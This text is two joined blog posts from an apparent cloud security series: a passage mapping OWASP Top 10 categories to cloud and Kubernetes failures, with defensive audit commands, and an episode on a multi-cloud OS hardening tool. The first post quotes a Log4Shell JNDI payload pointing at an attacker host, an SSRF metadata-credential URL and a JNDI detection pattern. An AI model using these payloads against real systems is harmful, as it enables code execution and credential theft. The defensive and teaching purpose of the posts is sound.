Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done
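
The DATABASE_URL case above has a recognizable shape: a URL with a user:password pair in front of the host. The following is a minimal sketch of a sweep for that shape, assuming plain-text files in a working tree. The function name find_url_credentials is hypothetical, and the pattern is a first pass that will miss secrets in any other form, so it does not replace a dedicated scanner.

```shell
#!/usr/bin/env bash
# find_url_credentials: recursively list lines that contain a URL with an
# embedded user:password pair, such as postgres://user:password@host/db.
# Hypothetical helper; prints file:line:content for each hit.
# Note: grep -r also descends into hidden directories such as .git.
find_url_credentials() {
  local dir="${1:-.}"
  grep -rnE '[a-zA-Z][a-zA-Z0-9+.-]*://[^/[:space:]:@]+:[^/[:space:]@]+@' "$dir"
}
```

Usage: find_url_credentials path/to/repo. An exit status of 1 means nothing matched.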

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances
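
For the Log4Shell half of this category, the lookup string itself is searchable in request logs. Below is a minimal sketch of a log sweep, assuming plain-text access logs. The function name find_jndi_probes is hypothetical, and the match covers only the unobfuscated form shown above, so nested-lookup variants will slip past it.

```shell
#!/usr/bin/env bash
# find_jndi_probes: print numbered log lines that contain a plain "${jndi:"
# lookup string. Hypothetical helper; reads the files given as arguments,
# or stdin when none are given. Case-insensitive, fixed-string match.
find_jndi_probes() {
  grep -i -F -n '${jndi:' "$@"
}
```

Usage: find_jndi_probes access.log, where access.log is a placeholder for your own log file. A hit shows that someone probed the service, not that the probe succeeded.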

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container started with docker run --privileged, or a pod spec that sets privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed; they were never designed in. Namespace isolation stops being an effective boundary when a container holds CAP_SYS_ADMIN, because that capability permits operations such as mounting filesystems. The attacker doesn’t exploit a vulnerability; they use capabilities the design granted.
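
Whether a running container was granted CAP_SYS_ADMIN can be read from the kernel’s own bookkeeping. This is a small sketch, assuming a Linux /proc filesystem. The function names are hypothetical; the bit position (21) is CAP_SYS_ADMIN’s number in the Linux capability list.

```shell
#!/usr/bin/env bash
# CAP_SYS_ADMIN is capability number 21 in the Linux capability list.
CAP_SYS_ADMIN_BIT=21

# has_cap_sys_admin: succeed (exit 0) if the given hex capability mask, as
# shown on the CapEff line of /proc/<pid>/status, has CAP_SYS_ADMIN set.
has_cap_sys_admin() {
  local mask_hex="$1"
  (( (16#${mask_hex} >> CAP_SYS_ADMIN_BIT) & 1 ))
}

# current_capeff: print the effective capability mask seen by this shell.
# awk reads its own /proc entry; it inherits the shell's capabilities.
current_capeff() {
  awk '/^CapEff:/ {print $2}' /proc/self/status
}
```

Usage, run inside the container: has_cap_sys_admin "$(current_capeff)" && echo "CAP_SYS_ADMIN present".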

# Find pods with a privileged container, or without pod-level runAsNonRoot: true
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(
      any(.spec.containers[]; .securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) |
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: A ClusterRoleBinding that grants cluster-admin to the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# List ClusterRoleBindings that grant cluster-admin; review any non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd. It would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu, but it was caught roughly five weeks after the backdoored release shipped, before it reached the stable releases of those distributions.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# Check whether the root user has MFA enabled (1 = enabled, 0 = not enabled)
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
# RepoDigests holds the registry digest (image@sha256:...); .Id is only the local image ID
docker inspect your-registry/your-image:tag --format='{{index .RepoDigests 0}}'
# Compare this digest to the pinned value in your deployment manifest
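
The grep above also reports local actions (./path), which have no tag to pin. A slightly more careful sketch classifies each reference instead. It assumes unquoted uses: values, and the function names are hypothetical.

```shell
#!/usr/bin/env bash
# classify_action_ref: classify the value of a workflow "uses:" key.
# Prints one of: local, pinned, mutable.
classify_action_ref() {
  local ref="$1"
  local sha_re='@[0-9a-f]{40}$'                       # full commit SHA
  local docker_re='^docker://.+@sha256:[0-9a-f]{64}$' # image pinned by digest
  if [[ "$ref" == ./* ]]; then
    echo "local"
  elif [[ "$ref" =~ $sha_re || "$ref" =~ $docker_re ]]; then
    echo "pinned"
  else
    echo "mutable"
  fi
}

# audit_workflow_refs: list every mutable "uses:" reference found under the
# given directory (default: .github/workflows). Trailing comments are ignored.
audit_workflow_refs() {
  local dir="${1:-.github/workflows}" ref
  grep -rhoE 'uses:[[:space:]]*[^[:space:]#]+' "$dir" \
    | sed -E 's/^uses:[[:space:]]*//' \
    | sort -u \
    | while read -r ref; do
        if [ "$(classify_action_ref "$ref")" = "mutable" ]; then
          echo "MUTABLE: $ref"
        fi
      done
}
```

Run audit_workflow_refs from the repository root. Each line it prints is a reference whose content can change without a change to your workflow file.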

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# List multi-region trails, then confirm that a trail is actually logging
aws cloudtrail describe-trails --include-shadow-trails \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,HomeRegion:HomeRegion}'
aws cloudtrail get-trail-status --name your-trail-name --query 'IsLogging'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had an SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication: any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved, so an SSRF that can only issue GET requests cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled
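
The two-step IMDSv2 exchange described above can be sketched with curl. It only returns data when run on an EC2 instance. The function names imds_token and imds_get are illustrative; the endpoint and header names are the ones IMDSv2 uses.

```shell
#!/usr/bin/env bash
# Link-local address of the EC2 Instance Metadata Service.
IMDS_BASE="http://169.254.169.254"

# imds_token: request an IMDSv2 session token with an HTTP PUT.
# The TTL header is mandatory; 21600 seconds (6 hours) is the maximum.
imds_token() {
  curl -sS -f -X PUT "${IMDS_BASE}/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
}

# imds_get: fetch a metadata path, presenting the session token in a header.
imds_get() {
  local path="$1" token
  token="$(imds_token)" || return 1
  curl -sS -f -H "X-aws-ec2-metadata-token: ${token}" \
    "${IMDS_BASE}/latest/meta-data/${path}"
}
```

Usage: imds_get instance-id. An attacker limited to steering the URL of a GET request can perform neither step, because both depend on a method and headers the attacker does not control.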

The Series Attack Map: Which Episodes Cover Which Categories

OWASP	Category	Purple Team Episode
A01	Broken Access Control	EP04: Broken access control in AWS
A02	Cryptographic Failures	EP06 (partial): CI/CD secrets exposure
A03	Injection	EP07: SSRF to cloud metadata
A04	Insecure Design	EP08: Kubernetes container escape
A05	Security Misconfiguration	EP08: Kubernetes container escape
A06	Vulnerable Components	EP09: Supply chain attacks
A07	Authentication Failures	EP05: MFA fatigue attacks
A08	SW/Data Integrity	EP06: CI/CD secrets exposure, EP09: Supply chain
A09	Logging/Monitoring Failures	EP11: Detection engineering with eBPF
A10	SSRF	EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
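echo "--- GuardDuty status in current region ---"
# list-detectors exits 0 even when no detector exists, so test the output instead
detectors=$(aws guardduty list-detectors --query 'DetectorIds' --output text 2>/dev/null)
[ -n "$detectors" ] && echo "$detectors" || echo "DISABLED"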

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report >/dev/null 2>&1
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
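# describe-trails exits 0 even when no trail matches, so test the output instead
trails=$(aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text 2>/dev/null)
[ -n "$trails" ] && echo "$trails" || echo "WARN: No multi-region trail"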

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.

Quick Reference

OWASP	Cloud Infrastructure Equivalent	Detection Tool
A01	IAM wildcards, public S3, broad trust policies	AWS Config, CloudTrail
A02	Plaintext secrets in env vars, unencrypted S3	TruffleHog, Macie
A03	SSRF, Log4j JNDI injection	WAF logs, GuardDuty instance-credential findings
A04	Privileged containers, no seccomp	OPA/Gatekeeper, Falco
A05	K8s RBAC defaults, open etcd, open SGs	kube-bench, AWS Config
A06	Unpatched base images, transitive CVEs, supply chain	Trivy, Grype, SLSA
A07	MFA fatigue, long-lived sessions, stolen tokens	GuardDuty, Okta logs
A08	Unsigned images, mutable CI references, build compromise	Cosign, SLSA, OIDC
A09	No CloudTrail, no GuardDuty, no runtime telemetry	AWS Security Hub
A10	IMDSv1 on EC2, SSRF to internal endpoints	VPC Flow Logs, CloudTrail

Key Takeaways

OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through March 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes (identity, supply chain, misconfiguration), and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.


One Blueprint, Six Clouds — Multi-Provider OS Image Builds

May 10, 2026 · April 27, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

OS Hardening as Code, Episode 3
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening

TL;DR

Multi-cloud OS hardening with separate scripts per provider means three scripts that drift within weeks
A HardeningBlueprint YAML separates compliance intent (portable) from provider details (handled by Stratum’s provider layer)
The same blueprint builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox with a single --provider flag change
Provider-specific differences — disk names, cloud-init ordering, metadata endpoint IPs — are abstracted away from the blueprint author
One YAML file becomes the single source of truth for OS security posture across your entire fleet, regardless of cloud
Drift detection works fleet-wide: rescan any instance against the original blueprint grade on any provider

The Problem: Three Clouds, Three Scripts, Three Ways to Drift

AWS hardening script          GCP hardening script          Azure hardening script
├── /dev/xvd* disk refs       ├── /dev/sda* disk refs       ├── /dev/sda* disk refs
├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS
├── cloud-init order A        ├── cloud-init order B        ├── cloud-init order C
└── Updated: Jan 2025         └── Updated: Aug 2024         └── Updated: Mar 2024
                                         │
                                         └─ 5 months behind
                                            on CIS updates

Multi-cloud OS hardening starts as a copy-paste of the AWS script. Within a month, the clouds diverge.

EP02 showed that a HardeningBlueprint YAML eliminates the skip-at-2am problem by making hardening a build artifact. What it assumed — quietly — is that you’re building for one provider. The moment you expand to a second cloud, the provider-specific details in the blueprint become a problem: disk names differ, cloud-init fires in a different order, and AWS-specific assumptions break silently on GCP.

We expanded from AWS to GCP six months ago. The EC2 hardening script had been working reliably for over a year. The GCP engineer took the AWS script, made some quick changes, and started building images.

The first GCP images had a subtle problem: the /tmp and /home separate partition entries in /etc/fstab referenced /dev/xvdb — an AWS disk naming convention. GCP uses /dev/sdb. The fstab entries were silently ignored. The mounts existed but weren’t restricted. The CIS controls for separate filesystem partitions were listed as passing in the scan output because the Ansible task had “run successfully” — it just hadn’t done what we thought.

It took a pentest three months later to catch it. The finding: six production GCP instances with /tmp not mounted with noexec, nosuid, nodev — despite our “CIS L1 hardened” label.

The root cause wasn’t the engineer. It was a hardening approach that required cloud-specific knowledge embedded in the script rather than in a provider abstraction layer.
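A check against the live mount table, rather than the task's exit status, would have caught this before the pentest did. Here is a minimal sketch, assuming the input is text in /proc/mounts format. The function name and the sample data are illustrative and are not part of Stratum or Ansible-Lockdown.

```python
REQUIRED_TMP_OPTIONS = {"noexec", "nosuid", "nodev"}


def missing_mount_options(mounts_text, mount_point, required=REQUIRED_TMP_OPTIONS):
    """Return the required options absent from mount_point.

    Returns None when mount_point is not a separate mount at all, which is
    the silent failure described above.
    """
    found = None
    for line in mounts_text.splitlines():
        fields = line.split()
        # /proc/mounts fields: device, mount point, fs type, options, dump, pass
        if len(fields) >= 4 and fields[1] == mount_point:
            found = set(fields[3].split(","))  # last matching entry wins
    if found is None:
        return None
    return set(required) - found


# Sample data (made up): the first table has no separate /tmp mount at all.
broken = "/dev/sda1 / ext4 rw,relatime 0 0\n"
hardened = broken + "/dev/sdb1 /tmp ext4 rw,nosuid,nodev,noexec,relatime 0 0\n"

print(missing_mount_options(broken, "/tmp"))    # None: no separate /tmp mount
print(missing_mount_options(hardened, "/tmp"))  # set(): all options present
```

On a real host the first argument would be the contents of /proc/mounts. Treating "not mounted" as its own result matters here, because that is the case the scan reported as passing.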

How Stratum Separates Compliance Intent from Provider Details

Multi-cloud OS hardening works when the compliance intent and the provider details are kept strictly separate.

HardeningBlueprint YAML
(compliance intent — portable)
         │
         ▼
  Stratum Provider Layer
  ┌─────────────────────────────────────────────┐
  │  AWS         │  GCP         │  Azure        │
  │  /dev/xvd*   │  /dev/sda*   │  /dev/sda*    │
  │  IMDS v2     │  GCP IMDS    │  Azure IMDS   │
  │  cloud-init  │  cloud-init  │  waagent       │
  │  order A     │  order B     │  order C       │
  └─────────────────────────────────────────────┘
         │
         ▼
  Ansible-Lockdown + Provider-Aware Configuration
         │
         ▼
  OpenSCAP Scan
         │
         ▼
  Golden Image (AMI / GCP Image / Azure Image)

The blueprint author declares what should be true about the OS. Stratum’s provider layer handles how that’s achieved on each cloud.

The disk naming, cloud-init sequencing, metadata endpoint configuration, and provider-specific package repositories are all abstracted into the provider layer. They never appear in the blueprint file.

The Same Blueprint Across Six Providers

# Build the same baseline on three clouds
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
stratum build --blueprint ubuntu22-cis-l1.yaml --provider gcp
stratum build --blueprint ubuntu22-cis-l1.yaml --provider azure

# The other three supported providers
stratum build --blueprint ubuntu22-cis-l1.yaml --provider digitalocean
stratum build --blueprint ubuntu22-cis-l1.yaml --provider linode
stratum build --blueprint ubuntu22-cis-l1.yaml --provider proxmox

The blueprint file is identical across all six. The output — AMI, GCP machine image, Azure managed image — is equivalent in terms of security posture. The same 144 CIS L1 controls apply. The same OpenSCAP scan runs. The same grade lands in the image metadata.

If you change the blueprint — add a control, update the Ansible role version, add a custom audit logging configuration — you rebuild all providers from the same source and all images come out consistent.

What the Provider Layer Handles

The provider layer is where the cloud-specific knowledge lives, so the blueprint author doesn’t have to carry it:

Disk naming:

Provider	OS disk	Ephemeral	Data
AWS	`/dev/xvda`	`/dev/xvdb`	`/dev/xvdc+`
GCP	`/dev/sda`	—	`/dev/sdb+`
Azure	`/dev/sda`	`/dev/sdb` (temp disk)	`/dev/sdc+`
DigitalOcean	`/dev/vda`	—	`/dev/vdb+`

The CIS controls for separate /tmp and /home partitions reference disk paths that differ across these providers. The provider layer translates the blueprint’s filesystem.tmp declaration into the correct fstab entries for the target cloud.
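To make the translation step concrete, here is a small sketch of a provider lookup that renders an fstab line for /tmp. It is an illustration of the idea, not Stratum's implementation: the function name, the ext4 filesystem, and the choice of the first partition on the first data disk are all assumptions. Only the device names come from the table above.

```python
# First data disk per provider, taken from the disk-naming table above.
FIRST_DATA_DISK = {
    "aws": "/dev/xvdc",
    "gcp": "/dev/sdb",
    "azure": "/dev/sdc",
    "digitalocean": "/dev/vdb",
}


def tmp_fstab_entry(provider, options=("nodev", "nosuid", "noexec")):
    """Render an fstab line for a separate /tmp on the given provider.

    Raises KeyError for an unknown provider instead of guessing a device,
    so a copy-pasted script cannot silently reuse another cloud's naming.
    """
    device = FIRST_DATA_DISK[provider]
    # Assumption: /tmp lives on the first partition of the first data disk.
    return f"{device}1 /tmp ext4 defaults,{','.join(options)} 0 2"


for name in ("aws", "gcp", "azure"):
    print(f"{name:6} {tmp_fstab_entry(name)}")
```

The design point is the hard failure on an unknown provider: the GCP incident happened because an AWS device name was accepted without complaint.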

Cloud-init ordering:

Different providers initialize services in different orders. On AWS, the network is available before cloud-init runs most tasks. On GCP, some network configuration happens after cloud-init starts. On Azure, the waagent handles some configuration that cloud-init handles elsewhere.

The provider layer sequences the hardening steps to run in the correct order for each provider — specifically, it waits for network availability before applying network-level hardening, and ensures the package manager is configured before running Ansible roles that require package installation.
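One way to express that sequencing is as a dependency graph that gets sorted before execution. The sketch below uses Python's standard graphlib module. The step names are hypothetical, and the assumption that package manager setup itself needs the network is mine; the other two constraints are the ones described above.

```python
from graphlib import TopologicalSorter

# Each step maps to the set of steps that must finish before it starts.
# Step names are hypothetical; they are not Stratum identifiers.
STEP_DEPENDENCIES = {
    "wait_for_network": set(),
    "configure_package_manager": {"wait_for_network"},  # assumption
    "apply_network_hardening": {"wait_for_network"},
    "run_ansible_roles": {"configure_package_manager"},
}

# static_order() yields one valid execution order that respects every edge.
order = list(TopologicalSorter(STEP_DEPENDENCIES).static_order())
print(order)
```

A per-provider graph like this keeps the ordering rules as data, so adding a provider means adding edges rather than rewriting a script.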

Metadata endpoint configuration:

CIS controls include restrictions on access to the instance metadata service (IMDSv2 enforcement on AWS, equivalent controls on GCP/Azure). The provider layer applies the correct restriction for each cloud — the blueprint just declares compliance: benchmark: cis-l1.

Building for All Providers Simultaneously

For fleet standardization, you can build all providers in a single operation:

# Build for all providers in parallel
stratum build \
  --blueprint ubuntu22-cis-l1.yaml \
  --provider aws,gcp,azure

# Output:
# [aws]   Launching build instance in ap-south-1...
# [gcp]   Launching build instance in asia-south1...
# [azure] Launching build instance in southindia...
# ...
# [aws]   Grade: A (98/100) — ami-0a7f3c9e82d1b4c05
# [gcp]   Grade: A (98/100) — projects/my-project/global/images/ubuntu22-cis-l1-20260419
# [azure] Grade: A (98/100) — /subscriptions/.../images/ubuntu22-cis-l1-20260419

All three builds run in parallel. All three images carry identical compliance grades. The GCP and Azure image names embed the benchmark level and build date for easy identification; the grade itself is recorded in the image metadata.

Blueprint Versioning and Drift Detection

Version-controlling the blueprint file solves a problem that multi-cloud environments hit consistently: knowing what your OS security posture was six months ago.

# Check the current state of a fleet instance against the blueprint
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Compare against original build grade
# Output:
# Instance: i-0abc123 (aws, ap-south-1)
# Original grade (build): A (98/100) — 2026-01-15
# Current grade (scan):   B (89/100) — 2026-04-19
# 
# Drifted controls (9):
#   3.3.2  — TCP SYN cookies: FAIL (sysctl net.ipv4.tcp_syncookies=0)
#   5.3.2  — sudo log_input: FAIL (removed from /etc/sudoers.d/)
#   ...

Drift detection compares the current instance state against the blueprint that built it. Controls that passed at build time and now fail indicate configuration drift — something changed after the image was deployed. This is how you find the three instances that a sysadmin “temporarily” modified and never reverted.
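The comparison itself is simple to sketch. The example below assumes each scan is reduced to a mapping of control ID to PASS or FAIL; that data shape and the function name are assumptions for illustration, not Stratum's output format.

```python
def drifted_controls(build_results, scan_results):
    """Return control IDs that passed at build time but do not pass now.

    Both arguments map a control ID to "PASS" or "FAIL". A control missing
    from the current scan is treated as drifted, since it can no longer be
    shown to pass.
    """
    return sorted(
        control
        for control, status in build_results.items()
        if status == "PASS" and scan_results.get(control) != "PASS"
    )


# Illustrative data only. 3.3.2 and 5.3.2 are the controls shown in the output
# above; 1.1.1 is a made-up control that already failed at build time, so it
# does not count as drift.
build = {"3.3.2": "PASS", "5.3.2": "PASS", "1.1.1": "FAIL"}
scan = {"3.3.2": "FAIL", "5.3.2": "FAIL", "1.1.1": "FAIL"}

print(drifted_controls(build, scan))  # ['3.3.2', '5.3.2']
```

Separating "failed at build" from "failed since build" is what makes the result actionable: only the second group points at a change made after deployment.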

Production Gotchas

Provider-specific CIS controls exist. CIS AWS Foundations Benchmark and CIS GCP Benchmark include cloud-specific controls (VPC flow logs, CloudTrail, etc.) that are separate from the OS-level CIS controls. The blueprint handles OS-level controls. Cloud-level controls (IAM, logging, network configuration) belong in your cloud security posture management tooling.

Build costs vary by provider. On AWS, the build instance is a t3.medium for 15–20 minutes (~$0.02). On GCP and Azure, equivalent pricing applies. For multi-provider builds, run them in regions close to your primary workloads to minimize image transfer time.

Proxmox builds require a local Stratum agent. Unlike cloud providers, Proxmox doesn’t have an API that Stratum can reach from outside. The Proxmox provider requires the Stratum agent running on the Proxmox host. The build process and blueprint format are identical; only the network topology differs.

GCP image sharing across projects requires explicit IAM. GCP machine images aren’t automatically available to other projects in the organization. After building, run stratum image share --provider gcp --image ubuntu22-cis-l1-20260419 --projects followed by the target projects, or configure sharing at the organization level.

Key Takeaways

Multi-cloud OS hardening with separate scripts per provider creates inevitable drift; a provider-abstracted blueprint eliminates it
The same HardeningBlueprint YAML builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox — the compliance intent is in the file, the provider details are in Stratum’s provider layer
Parallel multi-provider builds produce images with identical compliance grades on the same schedule
Drift detection works fleet-wide: any instance on any provider can be rescanned against the blueprint that built it
Blueprint version control is the single source of truth for OS security posture history — what was true on any given date, across any provider

What’s Next

